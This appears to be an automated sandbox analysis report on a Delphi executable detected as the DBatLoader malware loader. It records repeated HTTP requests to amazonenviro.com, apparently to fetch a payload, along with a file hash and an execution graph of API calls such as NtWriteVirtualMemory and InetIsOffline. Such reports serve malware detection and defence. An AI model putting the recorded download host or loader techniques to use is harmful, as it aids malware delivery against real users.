              2025-01-14 07:26:46 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:46 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              64192.168.2.1050103166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:47 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:47 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:47 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              65192.168.2.1050105166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:48 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:49 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:49 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              66192.168.2.1050107166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:50 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:51 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:50 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              67192.168.2.1050109166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:52 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:52 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:52 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              68192.168.2.1050111166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:54 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:54 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:54 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              69192.168.2.1050113166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:55 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:56 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:56 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              70192.168.2.1050115166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:57 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:57 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:57 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              71192.168.2.1050117166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:26:58 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:26:59 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:26:59 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              72192.168.2.1050119166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:27:00 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:27:01 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:27:00 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              73192.168.2.1050121166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:27:02 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:27:02 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:27:02 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              74192.168.2.1050123166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:27:03 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:27:04 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:27:04 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              75192.168.2.1050125166.62.27.1884437736C:\Users\user\Desktop\UTstKgkJNY.exe
              TimestampBytes transferredDirectionData
              2025-01-14 07:27:05 UTC165OUTGET /245_Tzzlqsjvkee HTTP/1.1
              Connection: Keep-Alive
              Accept: */*
              User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
              Host: amazonenviro.com
              2025-01-14 07:27:06 UTC225INHTTP/1.1 200 OK
              Date: Tue, 14 Jan 2025 07:27:05 GMT
              Server: Apache
              X-Powered-By: PHP/7.3.33
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Vary: Accept-Encoding
              Content-Length: 0
              Content-Type: text/html; charset=UTF-8


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Target ID:1
              Start time:02:24:58
              Start date:14/01/2025
              Path:C:\Users\user\Desktop\UTstKgkJNY.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\UTstKgkJNY.exe"
              Imagebase:0x400000
              File size:1'161'216 bytes
              MD5 hash:7E6AF615A074F41EA63EF69A047E8F6D
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:Borland Delphi
              Yara matches:
              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000001.00000002.2528020795.000000007FBB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 00000001.00000002.2512810785.00000000021E6000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
              Reputation:low
              Has exited:false

              Reset < >

                Execution Graph

                Execution Coverage:6.3%
                Dynamic/Decrypted Code Coverage:100%
                Signature Coverage:14.6%
                Total number of Nodes:268
                Total number of Limit Nodes:14
                execution_graph 25690 288bf78 25693 287f0a8 25690->25693 25694 287f0b0 25693->25694 25694->25694 28874 2878704 LoadLibraryW 25694->28874 25696 287f0d2 28879 2862ee0 QueryPerformanceCounter 25696->28879 25698 287f0d7 25699 287f0e1 InetIsOffline 25698->25699 25700 287f0fc 25699->25700 25701 287f0eb 25699->25701 25703 2864500 11 API calls 25700->25703 28891 2864500 25701->28891 25704 287f0fa 25703->25704 28882 286480c 25704->28882 28897 28780c0 28874->28897 28876 287873d 28908 2877cf8 28876->28908 28880 2862eed 28879->28880 28881 2862ef8 GetTickCount 28879->28881 28880->25698 28881->25698 28883 286481d 28882->28883 28884 2864843 28883->28884 28885 286485a 28883->28885 28886 2864b78 11 API calls 28884->28886 28887 2864570 11 API calls 28885->28887 28888 2864850 28886->28888 28887->28888 28889 286488b 28888->28889 28890 2864500 11 API calls 28888->28890 28890->28889 28892 2864504 28891->28892 28895 2864514 28891->28895 28894 2864570 11 API calls 28892->28894 28892->28895 28893 2864542 28893->25704 28894->28895 28895->28893 28982 2862c2c 11 API calls 28895->28982 28898 2864500 11 API calls 28897->28898 28899 28780e5 28898->28899 28922 287790c 28899->28922 28903 28780ff 28904 2878107 GetModuleHandleW GetProcAddress GetProcAddress 28903->28904 28905 287813a 28904->28905 28943 28644d0 28905->28943 28909 2864500 11 API calls 28908->28909 28910 2877d1d 28909->28910 28911 287790c 12 API calls 28910->28911 28912 2877d2a 28911->28912 28913 2864798 11 API calls 28912->28913 28914 2877d3a 28913->28914 28971 2878018 28914->28971 28917 28780c0 15 API calls 28918 2877d53 NtWriteVirtualMemory 28917->28918 28919 2877d7f 28918->28919 28920 28644d0 11 API calls 28919->28920 28921 2877d8c FreeLibrary 28920->28921 28921->25696 28923 287791d 28922->28923 28947 2864b78 28923->28947 28925 2877999 28928 2864798 28925->28928 28926 287792d 28926->28925 28956 286ba3c CharNextA 28926->28956 28929 286479c 28928->28929 28930 28647fd 28928->28930 28931 28647a4 28929->28931 28932 2864500 28929->28932 28931->28930 28934 28647b3 28931->28934 28936 2864500 11 API calls 28931->28936 28937 2864570 11 API calls 28932->28937 28938 2864514 28932->28938 28933 2864542 28933->28903 28935 2864570 11 API calls 28934->28935 28940 28647cd 28935->28940 28936->28934 28937->28938 28938->28933 28969 2862c2c 11 API calls 28938->28969 28941 2864500 11 API calls 28940->28941 28942 28647f9 28941->28942 28942->28903 28944 28644d6 28943->28944 28945 28644fc 28944->28945 28970 2862c2c 11 API calls 28944->28970 28945->28876 28948 2864b85 28947->28948 28954 2864bb5 28947->28954 28950 2864bae 28948->28950 28951 2864b91 28948->28951 28958 2864570 28950->28958 28957 2862c44 11 API calls 28951->28957 28963 28644ac 28954->28963 28955 2864b9f 28955->28926 28956->28926 28957->28955 28959 2864574 28958->28959 28960 2864598 28958->28960 28967 2862c10 11 API calls 28959->28967 28960->28954 28962 2864581 28962->28954 28964 28644b2 28963->28964 28966 28644cd 28963->28966 28964->28966 28968 2862c2c 11 API calls 28964->28968 28966->28955 28967->28962 28968->28966 28969->28933 28970->28944 28972 2864500 11 API calls 28971->28972 28973 287803b 28972->28973 28974 287790c 12 API calls 28973->28974 28975 2878048 28974->28975 28976 2878050 GetModuleHandleA 28975->28976 28977 28780c0 15 API calls 28976->28977 28978 2878061 GetModuleHandleA 28977->28978 28979 287807f 28978->28979 28980 28644ac 11 API calls 28979->28980 28981 2877d4d 28980->28981 28981->28917 28982->28893 28983 286e2e4 28984 286e2f2 VariantClear 28983->28984 28985 286e2ff 28983->28985 28997 286dfb0 28984->28997 28987 286e306 28985->28987 28988 286e315 28985->28988 28989 28644ac 11 API calls 28987->28989 28990 286e2fd 28988->28990 28991 286e336 28988->28991 28992 286e32d 28988->28992 28989->28990 29002 2872e24 EnterCriticalSection LeaveCriticalSection 28991->29002 29001 286e168 52 API calls 28992->29001 28995 286e33f 28995->28990 28996 286e34f VariantClear VariantInit 28995->28996 28996->28990 28998 286dfb4 28997->28998 28999 286dfb9 28997->28999 29003 286dd5c 43 API calls 28998->29003 28999->28990 29001->28990 29002->28995 29003->28999 29004 288d2fc 29014 2866518 29004->29014 29008 288d32a 29019 288bf84 timeSetEvent 29008->29019 29010 288d334 29011 288d342 GetMessageA 29010->29011 29012 288d336 TranslateMessage DispatchMessageA 29011->29012 29013 288d352 29011->29013 29012->29011 29015 2866523 29014->29015 29020 2864168 29015->29020 29018 286427c SysAllocStringLen SysFreeString SysReAllocStringLen 29018->29008 29019->29010 29021 28641ae 29020->29021 29022 2864227 29021->29022 29023 28643b8 29021->29023 29034 2864100 29022->29034 29026 28643e9 29023->29026 29029 28643fa 29023->29029 29039 286432c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 29026->29039 29028 28643f3 29028->29029 29030 286443f FreeLibrary 29029->29030 29031 2864463 29029->29031 29030->29029 29032 2864472 ExitProcess 29031->29032 29033 286446c 29031->29033 29033->29032 29035 2864110 29034->29035 29036 2864143 29034->29036 29035->29036 29040 2865814 29035->29040 29044 28615cc 29035->29044 29036->29018 29039->29028 29041 2865824 GetModuleFileNameA 29040->29041 29042 2865840 29040->29042 29048 2865a78 GetModuleFileNameA RegOpenKeyExA 29041->29048 29042->29035 29067 2861560 29044->29067 29046 28615d4 VirtualAlloc 29047 28615eb 29046->29047 29047->29035 29049 2865afb 29048->29049 29050 2865abb RegOpenKeyExA 29048->29050 29066 28658b4 12 API calls 29049->29066 29050->29049 29051 2865ad9 RegOpenKeyExA 29050->29051 29051->29049 29053 2865b84 lstrcpynA GetThreadLocale GetLocaleInfoA 29051->29053 29055 2865c9e 29053->29055 29059 2865bbb 29053->29059 29054 2865b20 RegQueryValueExA 29056 2865b5e RegCloseKey 29054->29056 29057 2865b40 RegQueryValueExA 29054->29057 29055->29042 29056->29042 29057->29056 29059->29055 29060 2865bcb lstrlenA 29059->29060 29061 2865be3 29060->29061 29061->29055 29062 2865c30 29061->29062 29063 2865c08 lstrcpynA LoadLibraryExA 29061->29063 29062->29055 29064 2865c3a lstrcpynA LoadLibraryExA 29062->29064 29063->29062 29064->29055 29065 2865c6c lstrcpynA LoadLibraryExA 29064->29065 29065->29055 29066->29054 29068 2861500 29067->29068 29068->29046 29069 2861c6c 29070 2861d04 29069->29070 29071 2861c7c 29069->29071 29072 2861d0d 29070->29072 29073 2861f58 29070->29073 29074 2861cc0 29071->29074 29075 2861c89 29071->29075 29078 2861d25 29072->29078 29092 2861e24 29072->29092 29077 2861fec 29073->29077 29081 2861fac 29073->29081 29082 2861f68 29073->29082 29079 2861724 10 API calls 29074->29079 29076 2861c94 29075->29076 29117 2861724 29075->29117 29084 2861d2c 29078->29084 29087 2861d48 29078->29087 29093 2861dfc 29078->29093 29099 2861cd7 29079->29099 29089 2861fb2 29081->29089 29090 2861724 10 API calls 29081->29090 29085 2861724 10 API calls 29082->29085 29083 2861e7c 29086 2861724 10 API calls 29083->29086 29102 2861e95 29083->29102 29107 2861f82 29085->29107 29104 2861f2c 29086->29104 29097 2861d79 Sleep 29087->29097 29109 2861d9c 29087->29109 29088 2861cfd 29108 2861fc1 29090->29108 29091 2861cb9 29092->29083 29096 2861e55 Sleep 29092->29096 29092->29102 29094 2861724 10 API calls 29093->29094 29111 2861e05 29094->29111 29095 2861fa7 29096->29083 29100 2861e6f Sleep 29096->29100 29101 2861d91 Sleep 29097->29101 29097->29109 29098 2861ca1 29098->29091 29141 2861a8c 29098->29141 29099->29088 29106 2861a8c 8 API calls 29099->29106 29100->29092 29101->29087 29104->29102 29110 2861a8c 8 API calls 29104->29110 29105 2861e1d 29106->29088 29107->29095 29112 2861a8c 8 API calls 29107->29112 29108->29095 29113 2861a8c 8 API calls 29108->29113 29114 2861f50 29110->29114 29111->29105 29115 2861a8c 8 API calls 29111->29115 29112->29095 29116 2861fe4 29113->29116 29115->29105 29118 286173c 29117->29118 29119 2861968 29117->29119 29128 28617cb Sleep 29118->29128 29131 286174e 29118->29131 29120 2861938 29119->29120 29121 2861a80 29119->29121 29127 2861947 Sleep 29120->29127 29134 2861986 29120->29134 29122 2861684 VirtualAlloc 29121->29122 29123 2861a89 29121->29123 29125 28616bf 29122->29125 29126 28616af 29122->29126 29123->29098 29124 286175d 29124->29098 29125->29098 29158 2861644 29126->29158 29132 286195d Sleep 29127->29132 29127->29134 29128->29131 29133 28617e4 Sleep 29128->29133 29130 286182c 29139 28615cc VirtualAlloc 29130->29139 29140 2861838 29130->29140 29131->29124 29131->29130 29135 286180a Sleep 29131->29135 29132->29120 29133->29118 29136 28615cc VirtualAlloc 29134->29136 29138 28619a4 29134->29138 29135->29130 29137 2861820 Sleep 29135->29137 29136->29138 29137->29131 29138->29098 29139->29140 29140->29098 29142 2861aa1 29141->29142 29143 2861b6c 29141->29143 29145 2861aa7 29142->29145 29148 2861b13 Sleep 29142->29148 29144 28616e8 29143->29144 29143->29145 29147 2861c66 29144->29147 29151 2861644 2 API calls 29144->29151 29146 2861ab0 29145->29146 29150 2861b4b Sleep 29145->29150 29155 2861b81 29145->29155 29146->29091 29147->29091 29148->29145 29149 2861b2d Sleep 29148->29149 29149->29142 29153 2861b61 Sleep 29150->29153 29150->29155 29152 28616f5 VirtualFree 29151->29152 29154 286170d 29152->29154 29153->29145 29154->29091 29156 2861c00 VirtualFree 29155->29156 29157 2861ba4 29155->29157 29156->29091 29157->29091 29159 2861681 29158->29159 29160 286164d 29158->29160 29159->29125 29160->29159 29161 286164f Sleep 29160->29161 29162 2861664 29161->29162 29162->29159 29163 2861668 Sleep 29162->29163 29163->29160 29164 2864c48 29165 2864c6f 29164->29165 29166 2864c4c 29164->29166 29167 2864c0c 29166->29167 29168 2864c5f SysReAllocStringLen 29166->29168 29169 2864c12 SysFreeString 29167->29169 29170 2864c20 29167->29170 29168->29165 29171 2864bdc 29168->29171 29169->29170 29172 2864bf8 29171->29172 29173 2864be8 SysAllocStringLen 29171->29173 29173->29171 29173->29172

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 0 287f0a8-287f0ab 1 287f0b0-287f0b5 0->1 1->1 2 287f0b7-287f0e9 call 2878704 call 2862ee0 call 2862f08 InetIsOffline 1->2 9 287f0fc-287f106 call 2864500 2->9 10 287f0eb-287f0fa call 2864500 2->10 13 287f10b-287f3ce call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 287efc8 9->13 10->13 115 287f3d4-287f3db call 287f024 13->115 116 288ae5e-288b3d4 call 28644d0 * 5 call 2864c0c call 28644ac call 2864c0c call 28644d0 call 28644ac call 28644d0 * 2 call 2864c0c call 28644d0 * 2 call 28644ac call 28644d0 call 28644ac call 28644d0 * 2 call 2864c0c call 28644d0 call 2864c0c call 28644d0 * 4 call 2864c0c call 28644ac call 2864c0c call 28644d0 * 2 call 28644ac call 28644d0 call 2864c24 call 28644d0 call 2864c24 call 28644d0 call 2864c0c call 28644ac call 2864c0c call 28644d0 * 2 call 28644ac call 2864c0c call 28644ac call 2864c0c call 28644d0 call 2864c0c call 28644ac call 2864c0c call 28644d0 call 2864c0c call 28644ac call 2864c0c call 28644d0 call 2864c0c call 28644ac call 2864c0c call 28644d0 * 2 call 2864c0c call 28644ac call 2864c0c call 28644d0 * 2 call 28644ac call 28644d0 call 2865788 call 28644d0 call 28644ac call 28644d0 * 2 call 286e374 call 28644d0 call 2865e58 call 28644d0 * 4 call 2865788 call 28644d0 call 2865788 call 28644d0 call 2864c0c call 28644d0 call 2864c0c call 28644ac call 28644d0 call 28644ac call 28644d0 call 2865788 call 28644d0 call 2864c0c call 28644d0 * 4 call 28644ac call 28644d0 13->116 115->116 121 287f3e1-287fd02 call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 28646a4 * 2 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 287894c call 286494c call 28646a4 call 287e36c call 2864500 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864798 call 2867e10 115->121 592 287fe15-287ff28 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 287e36c call 2864500 121->592 593 287fd08-287fe10 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864500 121->593 655 287ff2d-2880055 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286c2e4 call 2864500 592->655 593->655 688 288005c-288041d call 28649ac call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 287e36c call 2864500 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286494c call 28646a4 call 2867e10 655->688 689 2880057-288005a 655->689 800 2880bdf-28811b7 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864d8c call 287dfe4 call 2864500 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 287e4c0 call 28657c4 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864500 * 2 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 287e448 688->800 801 2880423-2880878 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864d8c call 287dfe4 call 2864500 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 287e4c0 call 28657c4 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864500 call 287e448 688->801 689->688 1055 28823b9-28825bc call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c 800->1055 1186 28811bd-28816ec call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2867a80 call 287ea4c call 2864500 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 287e4c0 call 28657c4 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c 800->1186 801->1055 1056 288087e-2880bda call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286494c call 2864d20 call 287dfe4 call 2864500 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c 801->1056 1226 28825be-28825c1 1055->1226 1227 28825c3-28825c8 1055->1227 1056->1055 1539 28816f6-288190b call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2864500 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 287e72c 1186->1539 1226->1227 1227->116 1230 28825ce-2882e78 call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 286480c call 286494c call 28646a4 call 2864798 call 286494c call 28646a4 call 287881c call 2867a80 call 